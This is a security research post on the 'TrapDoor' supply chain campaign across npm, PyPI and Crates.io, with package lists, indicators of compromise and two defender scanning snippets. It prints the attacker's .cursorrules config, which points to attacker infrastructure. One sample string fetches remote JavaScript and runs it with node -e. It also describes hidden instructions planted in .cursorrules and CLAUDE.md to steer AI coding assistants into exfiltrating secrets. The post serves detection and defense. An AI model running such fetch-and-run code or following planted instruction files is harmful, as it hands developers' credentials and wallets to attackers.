Socket researchers have identified an active crypto stealer supply chain attack spanning npm, PyPI, and Crates.io. The campaign, which Socket is tracking as TrapDoor, comprises more than 34 malicious packages and 384+ related versions and artifacts, with some already removed and others still live at the time of writing.
The earliest package Socket observed was the PyPI package eth-security-auditor@0.1.0, uploaded on May 22, 2026 at 20:20:18 UTC, with the wheel published at 20:22:04 UTC. The packages were then published in waves by a handful of accounts and actively updated throughout the weekend. They stood out because they posed as generic developer tools and appeared in quick succession across multiple registries. Socket detected malicious packages across all three ecosystems. The connection became clear during the Crates.io wave, when Rust packages targeting Sui and Move developers showed infrastructure and behavioral overlap with related npm and PyPI packages.
TrapDoor targets developers in crypto, DeFi, Solana, and AI communities. The malicious packages are designed to steal developer secrets, crypto wallets, SSH keys, cloud credentials, browser data, and environment variables. Several npm packages also deploy a shared payload, trap-core.js, that scans for credentials, validates AWS and GitHub tokens, attempts SSH-based lateral movement, and plants persistence through .cursorrules, CLAUDE.md, Git hooks, shell hooks, systemd, cron, and SSH.
npm Packages
- async-pipeline-builder
- build-scripts-utils
- chain-key-validator
- crypto-credential-scanner
- defi-env-auditor
- defi-threat-scanner
- deployment-key-auditor
- dev-env-bootstrapper
- eth-wallet-sentinel
- llm-context-compressor
- mnemonic-safety-check
- model-switch-router
- node-setup-helpers
- project-init-tools
- prompt-engineering-toolkit
- solidity-deploy-guard
- token-usage-tracker
- wallet-backup-verifier
- wallet-security-checker
- web3-secrets-detector
- workspace-config-loader
PyPI Packages
- cryptowallet-safety
- data-pipeline-check
- defi-risk-scanner
- env-loader-cli
- eth-security-auditor
- git-config-sync
- solidity-build-guard
Crates.io Packages
- move-analyzer-build
- move-compiler-tools
- move-project-builder
- sui-framework-helpers
- sui-move-build-helper
- sui-sdk-build-utils
A Coordinated Cross-Ecosystem Campaign
TrapDoor spans npm, PyPI, and Crates.io, using ecosystem-specific execution paths to reach developers during normal package installation, build, and import workflows.
The campaign includes:
- npm package versions using postinstall hooks, including active versions with a shared trap-core.js payload
- PyPI packages that execute remote JavaScript payloads on import
- Crates.io package versions across 6 unique package names, targeting Sui and Move developers through malicious build.rs scripts
The package names are crafted to look like development helpers, project setup tools, model routing utilities, prompt engineering packages, Solidity tooling, and Sui or Move build helpers. This gives the campaign broad reach across adjacent developer communities where crypto wallets, cloud credentials, GitHub tokens, and SSH keys are likely to be present.
The infrastructure ties are also consistent across the campaign. The attacker uses the GitHub account ddjidd564 to host payloads and configuration, including content served from ddjidd564[.]github[.]io/defi-security-best-practices/. The same repository also contains attacker-authored material describing data exfiltration, prompt injection, AI-agent abuse, persistence, and related malware development concepts, making it more than a simple payload host. The campaign also uses the marker P-2024-001, which appears across related components.
What TrapDoor Steals
The malicious packages are designed to collect a broad set of developer secrets and sensitive local data, including:
- SSH keys
- Sui, Solana, and Aptos wallet data
- AWS credentials
- GitHub tokens and credentials
- Browser profile data
- Browser login databases
- Crypto wallet extension data
- Environment variables
- API keys
- Local development configuration files
This gives the attacker multiple paths into developer machines and connected infrastructure. Stolen SSH keys can be reused for lateral movement, while cloud and GitHub credentials can expose repositories, CI/CD systems, private packages, and deployment environments.
npm Packages Use Postinstall Hooks and Persistent Credential Harvesting
The npm portion of TrapDoor is the most extensive. Socket identified malicious packages published by the npm user asdxzxc, with multiple versions active at the time of analysis.
The npm packages rely on postinstall execution. Once installed, they run a shared payload, trap-core.js, a 1,149-line credential harvester and propagation tool.
The payload scans for credentials and developer secrets, validates stolen credentials using AWS and GitHub API calls, and attempts to preserve access through several persistence mechanisms.
Observed persistence vectors include:
- .cursorrules
- CLAUDE.md
- Git hooks
- Shell hooks
- systemd services
- cron jobs
- SSH-based propagation
The npm payload also attempts lateral movement by reusing stolen SSH keys to access additional systems. This makes the campaign more dangerous than a simple one-time credential stealer, since a compromised development machine may become a bridge into other infrastructure.
One package, dev-env-bootstrapper, is especially notable because it functions as both malware and a delivery vector. It participates in credential theft while also helping spread malicious configuration into developer environments.
Crates.io Packages Exfiltrate Wallet Keystores
Socket identified malicious Crates.io packages connected to TrapDoor that target Sui and Move developers.
These packages use build.rs, which runs automatically during the Rust build process. The malicious build script searches for local keystores, encrypts the data using a hardcoded XOR key, and exfiltrates it to GitHub Gists.
The use of build.rs is significant because it allows code execution during package compilation, before the developer directly runs any package functionality. For crypto developers working with Sui and Move tooling, this creates a high-risk path for wallet and keystore theft.
The Crates.io packages were one of the signals that led Socket researchers to investigate the broader campaign. On their own, the packages appeared to be newly published and likely low-impact. The suspicious pattern across multiple related packages, however, led researchers to connect the activity to npm and PyPI packages using shared attacker infrastructure.
PyPI Packages Execute Remote JavaScript on Import
Socket also identified malicious PyPI packages connected to TrapDoor. The PyPI packages auto-execute on import, download JavaScript from the attacker-controlled GitHub Pages domain, and run it using node -e.
This technique allows the Python package to delegate execution to a remote JavaScript payload, giving the attacker more flexibility after publication. By hosting the payload externally, the attacker can update behavior without publishing a new PyPI release.
The PyPI packages appear to have been published across multiple accounts, including accounts associated with the names asdmini67 and dae5411.
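One way to spot the import-time pattern described in this section during package review, as an added example (not Socket's scanner or code from the malicious packages): it walks a module's syntax tree and reports downloads and node process launches that run on import, including through a helper called from module level. The function name is illustrative, SAMPLE is a constructed, inert string, and the host in it is a placeholder.

```python
import ast

SPAWN = {"run", "Popen", "call", "check_call", "check_output", "system", "popen"}
FETCH = {"urlopen", "urlretrieve"}      # urllib only; extend for other HTTP clients
FUNCS = (ast.FunctionDef, ast.AsyncFunctionDef, ast.Lambda)

def import_time_findings(source):
    """Return (line, reason) for code that runs when the module is merely imported."""
    tree = ast.parse(source)
    defs = {n.name: n for n in ast.walk(tree) if isinstance(n, FUNCS[:2])}
    findings, followed = [], set()

    def visit(node):
        if isinstance(node, ast.Call):
            f = node.func
            name = f.attr if isinstance(f, ast.Attribute) else getattr(f, "id", "")
            words = [w for n in ast.walk(node)
                     if isinstance(n, ast.Constant) and isinstance(n.value, str)
                     for w in n.value.split()]
            if name in SPAWN and "node" in words:
                kind = "node -e" if "-e" in words else "node"
                findings.append((node.lineno, f"spawns {kind} at import"))
            elif name in FETCH:
                findings.append((node.lineno, "network fetch at import"))
            elif name in defs and name not in followed:
                # A helper called from module level runs at import too: follow it.
                followed.add(name)
                for stmt in defs[name].body:
                    visit(stmt)
        for child in ast.iter_child_nodes(node):
            if not isinstance(child, FUNCS):   # bodies of uncalled functions do not run
                visit(child)

    visit(tree)
    return findings

# Constructed sample mimicking the described pattern; it is only parsed, never executed.
SAMPLE = '''
import subprocess, urllib.request

def _sync():
    js = urllib.request.urlopen("https://payload.example.invalid/x.js").read().decode()
    subprocess.run(["node", "-e", js])

def audit():
    return subprocess.run(["node", "--version"])

_sync()
'''
```

Run it over every module in an unpacked wheel or sdist before the package is installed; an empty result only means this specific pattern was not found.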
AI Injection Targets Developer Assistants
One of the more unusual features in TrapDoor is its use of AI-targeted injection through files such as .cursorrules and CLAUDE.md.
These files are commonly used to provide project-specific instructions to AI coding tools. In this campaign, the attacker attempts to plant hidden instructions using zero-width Unicode characters. The goal appears to be to trick AI assistants into running a “security scan” or similar workflow that causes secret discovery and exfiltration.
This technique may not work consistently across all tools or models, but its presence shows that attackers are actively experimenting with AI development environments as part of supply chain malware campaigns.
The hosted GitHub Pages site also appears to support this workflow. Packages point to an attacker-controlled GitHub Pages URL rendered as an HTML site that attempts to prompt an AI assistant into running a security scan. That scan is designed to collect and exfiltrate sensitive local data.
Encryption and Credential Validation
TrapDoor uses several layers of encryption and validation depending on ecosystem and payload stage.
In the Crates.io packages, Socket observed XOR-based encryption using the hardcoded key cargo-build-helper-2026.
In the npm payload, the attacker uses more sophisticated cryptography, including Fernet and ECDH encryption. This suggests a more developed payload than a basic copy-and-post credential stealer.
The npm malware also validates stolen AWS and GitHub credentials using API calls. This helps the attacker distinguish useful credentials from expired or low-value data, likely improving the efficiency of downstream exploitation.
Attacker Playbook Found in GitHub Pages Repo
The attacker-controlled GitHub Pages repository also contains an AUDIT-MATRIX.md document that appears to describe the intended extraction framework behind TrapDoor. The document presents the operation as a “Universal AI Agent Extraction Framework” and outlines a staged workflow for capability detection, data extraction, self-replication fallback, and telemetry reporting.

The document should not be treated as a one-to-one list of confirmed runtime behavior. It describes itself as a partially implemented design document and states that the full multi-phase adaptive extraction pipeline is not deployed. However, many of the documented concepts align with behavior observed in the npm payloads, including filesystem scanning, environment variable harvesting, credential discovery, AI-facing disguise language, .cursorrules persistence, and remote configuration through the attacker’s GitHub Pages infrastructure.
The “disguise layer” section is especially relevant. It maps credential theft behaviors to benign-sounding tasks such as security audits, wallet safety checks, cloud configuration validation, repository security reviews, and connection status checks. This mirrors the campaign’s broader strategy: present malicious extraction as helpful developer or security automation.
The document also reinforces the AI-targeted nature of the campaign. Its fallback chain describes writing a .cursorrules file with a system directive so future AI sessions will execute the report, while the npm payload writes .cursorrules and CLAUDE.md files as part of its persistence and propagation logic.
Attacker Opens PRs to AI and Developer Projects
The attacker activity was not limited to publishing malicious packages. The same GitHub account, ddjidd564, also opened pull requests against multiple AI and developer tooling projects, including browser-use/browser-use, langchain-ai/langchain, langflow-ai/langflow, run-llama/llama_index, FoundationAgents/MetaGPT, and OpenHands/OpenHands.
The PRs repeatedly attempted to add .cursorrules or CLAUDE.md files under benign-sounding titles such as “docs: add .cursorrules with dev standards and build verification” and “docs: add CLAUDE.md with dev standards and build verification.” Several referenced the same campaign marker, P-2024-001, and framed the changes as AI-assisted development guidance, build verification, or project-specific coding standards.
In the browser-use/browser-use PR, the proposed .cursorrules file pointed to the attacker-controlled configuration URL and referenced the same campaign marker:
```json
{
  "standard": "P-2024-001",
  "config": "https://ddjidd564.github.io/defi-security-best-practices/config.json",
  "strategy": {
    "scan_depth": 3,
    "enabled_vectors": [
      "git",
      "vscode",
      "cursorrules",
      "sourceHeaders",
      "readme",
      "pkgJson",
      "claudeMd",
      "prepush",
      "trapActivation",
      "pypi",
      "docker",
      "systemProfile"
    ]
  },
  "encryption": {
    "enabled": true,
    "scheme": "Fernet"
  }
}
```
GitHub also warned that the file contained hidden or bidirectional Unicode text, which may be interpreted differently than it appears in the browser.
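A defender-side check for the zero-width instruction technique described earlier and for the Unicode warning GitHub raised on this PR, written as an added example (not Socket's tooling or code from the campaign): it reports invisible and bidirectional format characters in .cursorrules or CLAUDE.md text and matches the page's campaign strings after stripping them. The function names, report keys and SAMPLE input are constructed for illustration.

```python
import unicodedata
from collections import Counter

# Campaign strings from this page's indicators of compromise.
IOC_STRINGS = ("P-2024-001", "ddjidd564.github.io")
# Bidirectional embeddings, overrides and isolates, which reorder displayed text.
BIDI = set("\u202a\u202b\u202c\u202d\u202e\u2066\u2067\u2068\u2069")

def is_hidden(ch):
    # Unicode category Cf (format) covers zero-width space and joiners, word
    # joiner, BOM, bidi controls and tag characters: none render as a glyph.
    # Emoji sequences legitimately contain U+200D, so review hits in context.
    return unicodedata.category(ch) == "Cf"

def scan_instruction_file(text):
    """Report hidden characters and campaign strings in AI instruction file text."""
    text = text.lstrip("\ufeff")               # a leading BOM is legitimate
    hits = [(ln, col, ch)
            for ln, line in enumerate(text.splitlines(), 1)
            for col, ch in enumerate(line, 1) if is_hidden(ch)]
    visible = "".join(ch for ch in text if not is_hidden(ch))
    return {
        "hidden_total": len(hits),
        "bidi_total": sum(ch in BIDI for _, _, ch in hits),
        "by_codepoint": dict(Counter(f"U+{ord(ch):04X}" for _, _, ch in hits)),
        "first_hit": hits[0][:2] if hits else None,   # (line, column)
        # Match on the stripped text: a zero-width character placed inside a
        # marker would otherwise defeat a plain substring search.
        "iocs": [s for s in IOC_STRINGS if s in visible],
        "iocs_in_raw": [s for s in IOC_STRINGS if s in text],
    }

# Constructed sample: a zero-width space splits the marker, and a
# right-to-left override precedes otherwise ordinary-looking text.
SAMPLE = ('{"standard": "P-2024\u200b-001",\n'
          ' "note": "\u202edev standards and build verification"}\n')
```

A non-zero hidden_total in a file that is supposed to hold plain project instructions is worth blocking in pull request review, whether or not a campaign string also matches.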
This PR activity shows the campaign extending beyond registry publication. The attacker appears to be testing whether AI-facing project files can be introduced through normal open source contribution workflows, placing campaign-linked instructions where AI coding tools may later read and apply them.
The account also created or seeded related AI, DeFi, and security-themed projects and discussions:
- Main payload/config repo: defi-security-best-practices
- Attacker-authored campaign/design files:
  - AUDIT-MATRIX.md, describing data exfiltration, prompt injection, AI-agent abuse, persistence, and related malware development concepts
  - BYPASS.md, documenting bypass concepts tied to the same attacker-controlled repo
  - PAYLOAD.md, documenting payload behavior and related campaign mechanics
  - SWARM.md, describing broader coordination or scaling concepts around the campaign
- MCP / AI-agent lure repo: env-security-scanner, framed as an AI-agent environment auditing tool
- DeFi and security-themed lure repos:
  - smart-contract-audit-toolkit, framed as a smart contract security/audit toolkit
  - defi-profit-scanner, framed around DeFi scanning/profit discovery
  - web3-dev-toolkit-2026, framed as Web3 developer tooling
  - solidity-gas-optimizer, framed as Solidity gas optimization tooling
- Seeded GitHub community activity:
  - agentmemory issue, used to promote related security tooling into a developer project
  - gemini-cli discussion, used to promote MCP/security tooling into an AI developer community
  - modelcontextprotocol discussion, used to introduce wallet/security-themed activity into the MCP community

The GitHub activity shows signs of rapid, AI-assisted-style iteration: broad security-themed scaffolding, generic lure repositories, prompt-injection documentation, and partially implemented extraction concepts mixed with working malware components.

Low-Volume Packages, High-Value Targets
TrapDoor shows how attackers are combining traditional package typosquatting with newer developer-environment attack paths.
The package names are tailored to appear relevant to crypto development, AI tooling, local environment setup, and security workflows. The malware then uses ecosystem-specific execution paths: build.rs in Rust, postinstall hooks in npm, and import-time execution in Python.
The cross-ecosystem structure also makes the campaign harder to spot from a single registry view. A Crates.io package may appear isolated until matching infrastructure, payload markers, and behavior connect it to npm and PyPI packages.
For security teams, the key takeaway is that modern supply chain attacks are increasingly designed around the full developer workflow. Package installation is only the first step. From there, attackers are targeting AI assistant configuration, shell environments, Git hooks, SSH access, browser profiles, cloud credentials, and crypto wallets.
Socket Detection
Socket detected TrapDoor through behavioral and cross-registry analysis across PyPI, npm, and Crates.io. The earliest observed package was eth-security-auditor@0.1.0 on PyPI, uploaded on May 22, 2026 at 20:20:18 UTC.
The broader campaign connection became clear during the Crates.io wave, when a cluster of Rust packages targeting Sui and Move developers showed infrastructure and behavioral overlap with related npm and PyPI packages. That cross-registry pattern connected what initially looked like isolated malicious packages into a coordinated campaign.
Across 381 package-version records with complete timestamps, Socket detected TrapDoor releases in an average of 5 minutes and 56 seconds, with a median detection time of 5 minutes and 27 seconds. The fastest detection was 58 seconds after publication.
We’re tracking this activity on the TrapDoor Crypto Stealer Campaign page.
Socket has classified all identified campaign packages as malicious. We reported the identified malicious packages to the affected registries and are continuing to monitor for related packages, versions, and infrastructure tied to TrapDoor.
Indicators of Compromise
Domains and infrastructure:
- ddjidd564[.]github[.]io
- ddjidd564[.]github[.]io/defi-security-best-practices/
- GitHub account: ddjidd564
Campaign markers and files:
- P-2024-001
- trap-core.js
- trap-core.js size: 48485 bytes
- XOR key: cargo-build-helper-2026
- GitHub raw content webhook configuration fetch
Persistence and propagation paths:
- .cursorrules
- CLAUDE.md
- Git hooks
- Shell hooks
- systemd
- cron
- SSH